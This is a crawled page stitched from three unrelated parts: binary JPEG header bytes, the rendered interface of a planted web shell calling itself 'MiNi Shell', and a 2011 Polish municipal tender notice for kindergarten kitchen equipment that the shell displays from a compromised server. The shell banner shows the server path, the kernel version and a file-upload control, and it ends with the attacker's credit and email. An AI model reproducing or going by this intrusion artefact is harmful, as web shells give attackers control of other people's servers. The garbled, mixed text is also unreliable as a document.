JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110412/74910-N-2011.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Dostawa i montaż wyposażenia KUCHNI  Przedszkola Publicznego przy ulicy Górnej 12 
w Grodzisku Mazowieckim</b><br>
<b>Numer ogłoszenia: 74910 - 2011; data zamieszczenia: 12.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodzisk Mazowiecki , ul. Kościuszki 32A, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 022 7555146, faks 022 7555327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.grodzisk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia KUCHNI  Przedszkola Publicznego przy ulicy Górnej 12 
w Grodzisku Mazowieckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Podstawowy zakres zamówienia.
Przedmiotem zamówienia jest dostawa i montaż mebli, sprzętu, urządzeń i drobnego wyposażenia kuchni Przedszkola Publicznego na około 300 dzieci. 
Wykonawca w ramach przedmiotowego zamówienia zobligowany jest do dostarczenia mebli kuchennych, sprzętu i drobnego wyposażenia  do nowo wybudowanego Przedszkola przy ul. Górnej 12 w Grodzisku Mazowieckim, dokonania ich rozładunku, wniesienia ich do pomieszczeń wskazanych przez Dyrektora montażu mebli  i urządzeń na miejscu ich ustawienia, wypoziomowania, usunięcia opakowań związanych z dostawą i montażem mebli  i sprzętu. 
 Przed realizacją dostawy wykonawca zobowiązany jest do dokonania ewentualnych drobnych korekt wymiarowych. Wykonawca jest również zobowiązany do uzgodnienia z zamawiającym proponowanych elementów dostaw. 
Meble , sprzęt i drobne wyposażenie muszą być zgodne z obowiązującymi przepisami oraz zasadami, systemem  HACCP oraz GHP/GMP dla placówek żywienia zbiorowego /w szczególności normy techniczne EN60335-1,EN60335-2,EN 50082-1,EN 55014, 61000-3-2,61000-3-3,EN 000-4-2, EN 61000-4-4 oraz  dyrektywy EU/73/23/EEC, EMC 89/336 EEC, 93/68 EEC dla garnków ,patelni, noży, obieraczek;               EN ISO 9001-1211549-03, EN ISO9002-121299, EN CE 0123(4)-121502, 0123(6)-121518 oraz dyrektywy 73/23 EEC, EMC, 89/336 EEC, 98/68 EEC dla pojemników i desek; EN 60204-1, EN55014,EN 50081-1, EN 50081-2 dla krajalnic; meble, wózki, okapy ze stali nierdzewnej  powinny posiadać Świadectwo jakości zdrowotnej. Szafy chłodnicze i mroźnicze powinny być zgodne z dyrektywami i normami WE oraz normami dotyczącymi urządzeń elektrycznych : 73/23/EWG, 89/392/EWG, 93/68/EWG, PN-EN 60335-2-89:2003(U), PN-EN 55014-1,55014-2,61000-3-2, 61000-3-3 Oferowane meble muszą być zgodne z Ustawą o warunkach zdrowotnych żywności i żywienia z 11.05.2001 /Dz.U.2001 nr 63 poz.634/ oraz ustawą o materiałach i wyrobach przeznaczonych do kontaktu z żywnością z 6.09.2001 /Dz.U. 2001 nr 128 poz.1408/ i muszą posiadać świadectwa dopuszczenia do użytkowania.
Wszystkie podane w SIWZ oznaczenia wskazujące na określonego producenta, katalogi, numery katalogowe itp. mają charakter przykładowy i służą do określenia wymaganych przez zamawiającego cech i parametrów dostaw. Dopuszcza się zastosowanie wyrobów równoważnych opisywanym. 
Wielkości charakterystyczne dla podstawowego zakresu robót:
1.Stół ze zlewem półką z otworem pod baterię , z rantem z tyłu, 
   ze stali nierdzewnej /różne wymiary ok.1200x700x900/                          - 7 szt.
2.Stół do pracy z półką lub blokiem szuflad z rantem z tyłu , ze 
   stali nierdzewnej /różne wymiary ok.1700x700x850/                             - 27 szt.
3.Regał magazynowy z 4 półkami gretingowymi, przestawnymi ze stali
   nierdzewnej /różne wymiary ok.1220x455x1800/                                    - 8 szt.
4.Półki wiszące ze stali nierdzewnej z rantem z tyłu ze stali nierdzewnej
/różne wymiary ok.1470x300x250/                                                             - 5 szt.
5.Wózki szafkowe do rozwożenia posiłków z półką ze stali nierdzewnej -  11 szt.
6.Okap centralny  ze stali nierdzewnej 4800x2300x450                            -  1 kpl.
7.Waga platformowa                                                                                  - 1 szt.
8.Szafy chłodnicze 630l ,stal nierdzewna                                                   - 7 szt.
9.Szafa mroźnicza 630l, stal nierdzewna                                                    - 1 szt. 
10.Zespół  komory mroźniczej i chłodni z agregatami  typu Split ,
    naścienne, niezależnie zasilane , moc 2x2,5/230 dla pomieszczenia
    o wymiarach 3970x2150x2600                                                               -  1 kpl.                                                                                               
11.Chłodziarka podblatowa                                                                         - 1 szt.

12.Piec elektryczny konwekcyjno-parowy 7x1/1GN 
    z panelem elektronicznym , ze spryskiwaczem komory pieca
    i podstawą do pieca z prowadnicami                                                    - 1 kpl.
13.Patelnia elektryczna, patelnia gazowa                                                 - 2 szt.
14.Kocioł warzelny gazowy 150l                                                               -  1 szt.
15.Trzon elektryczny 6 palnikowy                                                             -  2 szt. 
16.Miesiarka planetarna                                                                            -  1 szt.
17.Zmywarka kapturowa z pompa wspomagającą i panelem elektronicznym
     w obudowie ze stali nierdzewnej                                                          -  1 szt.
18. Zaparzacze 15l                                                                                     - 5 szt. 
19.Garnki i rondle ze stali nierdzewnej pojemność od 3 do 88l                 - 16 szt.
20. Patelnie teflonowe                                                                                  - 7 szt.
21.Pojemniki ze stali nierdzewnej z pokrywami , różne wymiary               - 75 szt    
22.Pojemniki polietylenowe z pokrywami, różne wymiary                         - 30 szt.
23.Talerze /głęboki, płytki, deserowy/ze szkła nietłukącego                      - 300 kpl.
24.Sztućce ze stali nierdzewnej                                                                - 300 kpl.
25.Wilk do mielenia mięsa                                                                            - 1 kpl.
26.Krajalnica                                                                                                 - 1 kpl.
27.Szatkownica                                                                                             - 1 kpl.
28.Sitka i cedzaki                                                                                          - 8 szt.
29. Chochle, łyżki, widelce , łopatki                                                             - 30 szt.
30.Inne /rózgi, deski, noże, tarki , szczypce, tłuczki, obieraczki/                 - 53 szt.
31.Waga elektroniczna 150kg i 15 kg                                                            - 2 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.22.00.00-0, 39.31.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wysokość wadium.
1)	Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
     8 000,00 PLN  słownie: osiem tysięcy złotych.
2.Forma wadium.
1)	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe i nieodwołalne, płatne na pierwsze żądanie, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
c)	kwotę gwarancji/poręczenia,
d)	termin ważności gwarancji/poręczenia,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
     - odmówił podpisania umowy na warunkach określonych w ofercie, lub
     - nie wniósł zabezpieczenia należytego wykonania umowy, lub
     - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
     - w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 ustawy prawo zamówień
        publicznych nie złożył dokumentów o których mowa w art. 29 ust. 1 pz.p., lub
        pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie
3. Miejsce i sposób wniesienia wadium.
1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

Bank  PKO BP S.A  ul. Nowogrodzka 35/41  W-wa  92 1020 1055 0000 9302 0133 2980  

Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z oryginałem lub dostarczyć ją zamawiającemu przed otwarciem ofert.
2)	Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w oryginale wraz z ofertą lub przed terminem złożenia Ofert w kasie Urzędu Miasta Grodzisk Maz.  ul. Kościuszki 32A

4. Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 

W wymienionym przypadku dołączenie do oferty /lub przekazanie przed otwarciem ofert kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
5. Zwrot wadium.
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46  p.z.p..  
6. Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
    w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
   3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
       po stronie Wykonawcy.
    4) w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 , nie złożył  dokumentów o których
        mowa w art.25 ust.1 p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
        nie leżących po jego  stronie .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał:
- co najmniej 2 zadania dotyczące wykonywania podobnych dostaw do placówek oświatowych lub gastronomicznych /przedszkola, szkoły, żłobki, gastronomia itp/ o wartości min. 150 000 zł każda (przez podobne dostawy Zamawiający rozumie dostawę mebli, sprzętu i drobnego wyposażenia kuchni wraz z ich montażem )
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych dostaw sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ oraz dokumenty potwierdzające, że dostawy te zostały wykonane należycie (referencje od inwestorów, protokóły bezusterkowego odbioru robót podpisane przez inwestorów itp.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający przewiduje jednak możliwość zmiany zawartej umowy w przypadku:
     a) zmiany osób wskazanych w ofercie
b)  wystąpienia siły wyższej,
c) okoliczności niezależnych od stron i niemożliwych do przewidzenia, a
    uniemożliwiających osiągnięcie celu umowy,
d) wprowadzenia przez zamawiającego istotnych zmian w dokumentacji lub warunkach wykonania robót
   /przedłużenie terminu zakończenia realizacji umowy o okres potrzebny na dostawę wyrobów
   zamiennych/ 
W przypadku wystąpienia którejkolwiek z okoliczności określonych w pkt 3 b-d, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip-oit.grodzisk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Grodzisku Maz., ul. Kościuszki 32a, 05-825 Grodzisk Mazowiecki, pok. nr 104..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 11:00, miejsce: Kancelaria Notarialna w Grodzisku Mazowieckim, Notariusz Beata Maria Kuczyńska, Notariusz Piotr Kuczyński S.C. , ul. Bartniaka 12 A, 05-825 Grodzisk Maz..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com